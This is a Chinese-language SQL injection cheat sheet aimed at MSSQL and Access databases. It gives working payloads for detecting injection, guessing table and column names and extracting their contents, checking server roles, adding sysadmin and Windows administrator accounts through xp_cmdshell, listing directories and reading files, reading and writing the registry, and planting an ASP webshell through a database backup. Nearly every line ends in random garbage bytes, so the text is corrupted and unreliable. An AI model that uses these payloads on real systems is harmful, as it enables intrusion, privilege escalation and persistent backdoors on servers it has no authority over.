1.判断是否有注入;and 1=1 ;and 1=2 G.#`��D�aP
2.初步判断是否是mssql ;and user>0 {[Bo��"a>%
jS_�fwuM��
3.注入参数是字符'and [查询条件] and ''=' *Cs��R�O��
bU3�e�*�Er
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �/3(� a'o[
�cu�)s��sT
5.判断数据库系统 os<YfMM<:/
/E(31�9u�_
;and (select count(*) from sysobjects)>0 mssql 99xs�5!4�s
2QU�ZBrs s
;and (select count(*) from msysobjects)>0 access bf#@��Y�kE
"Q{)H8,E)x
{\HEU�Ia]w
?\�_\p�a/+
6.猜数据库 ;and (select Count(*) from [数据库名])>0 }cl�~Vo-mp
EMe3Xb�
`
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ��.�\/jy]Y
OC�(S"&��D
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ����12�W`7
W Z!?O�0.A
9.(1)猜字段的ascii值(access) ��.O��h4b5
�n�u'r��`
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 1=R6||�8ws
CJ�n{�tP��
(2)猜字段的ascii值(mssql) M|HW$8V3_2
(4;�m*'�X
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �(Nzup�3j�
b#h�}g>l��
10.测试权限结构(mssql) ~�Bw)�rf,�
xK7x�A��O
%Y�0,�ww�2
H�N�F�G:t9
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 6�b�v�~E.�
%�s|`��1`c
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- .?<M$38f�v
?vnO@Bb/�a
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- H>��zX8qP+
n\��X'��2�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- >��h!>L��l
nU^�-D1s{
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ��X�`�,=tM
A� }(��V�2
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- blUnAu
o~�
o8PK�,!Pl�
;and 1=(select IS_MEMBER('db_owner'));-- T/�m4jf2��
Z4&�,Kr�V�
j@7�%�% ��
FR bm�eq3c
11.添加mssql和系统的帐户 pJ�nT� \~o
NU�]�+ {�7
;exec master.dbo.sp_addlogin username;-- "L�?h�@8sa
;exec master.dbo.sp_password null,username,password;-- o7_�*#5rD�
��#8cpZ]�#
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- O_gr{L}���
{c(@u6l�28
;exec master.dbo.xp_cmdshell 'net user username password xZMQ+OW2�i
( o(,��;��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- }jfOs��(Q]
xOKLc��!�J
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ��]�U4)2�s
YI8�7�7T9>
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �<l#|�I'hP
Lo<-�;;�vQ
��vZ&{� ��
ZmXO3,s�f)
12.(1)遍历目录 ����jyL��E
l0
Eh��?��
;create table dirs(paths varchar(100), id int) 4l��Vvs(W?
\sSt� _|+�
;insert dirs exec master.dbo.xp_dirtree 'c:\' ��-@I+I�Kz
�2aDjt{7P
;and (select top 1 paths from dirs)>0 h?�8I`Z)h
u0�o}�r��A
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) %z�9l�CTmy
$�u ae8h��
`rWT^E@p5m
�4�~s{zo�b
(2)遍历目录 tz6N,4�J?
cs-wqxTX[$
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 3QD+&��9{D
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 q�cmf*Yl:v
[.
rULQ��l
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ��6d��#� 7
�9"g�!J|+�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 y;GwMi�$KI
�O
,9,=�2j
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 )R+26wZ|n*
t�CF,KP?��
�w%3*T#t�p
&E/0��jxM1
13.mssql中的存储过程 4�qYT�����
U8>M�`�e"D
xp_regenumvalues 注册表根键, 子键 'joc8o� sS
�s7�789pR�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 *�XCgl*% *
[& d"Z2gK
xp_regread 根键,子键,键值名 �(m~gG|n�4
)<�~v�~|re
;exec xp_regread U!TSAg�21P
E!��s?amM4
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 R�(��1N�]>
r�L�Kwu��Z
xp_regwrite 根键,子键, 值名, 值类型, 值 �*LZB�.�84
FD1Z}v!5IJ
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 =O.%�)�|
H\�PY\O&cP
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 *�7Js�m�N?
-(;<Q_'s{"
xp_regdeletevalue 根键,子键,值名 ; *Z�iH%q,
�n N_�Yl�w
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �9w�:F�_gr
�p]]*�H2UD
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 A8�zh27[w%
N �E/���_�
,zP.ch�0�K
{0~xv@� �U
14.mssql的backup创建webshell m"|AD/2;�(
�8q�"�C=t7
use model t�e*|>NR�S
,|�7!/�]0&
create table cmd(str image); gm1 7��VrC
�N�
t-�8[J
insert into cmd(str) values (''); !�l�7D1�i~
-*nd�5(lY&
backup database model to disk='c:\l.asp'; H�X`>�"
?{
`,7�;2ZG~O
�vNn�$��dc
dBeZ�x1D�y
15.mssql内置函数 a�Gx[?}=�
}rKKIF^f\S
;and (select @@version)>0 获得Windows的版本号 .B?���J@�,
~�USU\dn�i
;and user_name()='dbo' 判断当前系统的连接用户是不是sa qrLE1�b 1$
S�O#R5Mu2N
;and (select user_name())>0 爆当前系统的连接用户 R)�Y�*<�Na
:9.QhY)D�
;and (select db_name())>0 得到当前连接的数据库 u�J���:SN;
(o�G-h�"^/
�B�e4n\c�.
�=��
a54�
16.简洁的webshell `*ml/% �\
hl���O,mU�
use model U8]BhJr$�Q
%gbvX^E�?
create table cmd(str image); Od?�b(bE.]
�R�]xXG0��
insert into cmd(str) values (''); *B0�
�7-��
+]*�hzWbe
backup database model to disk='g:\wwwtest\l.asp';
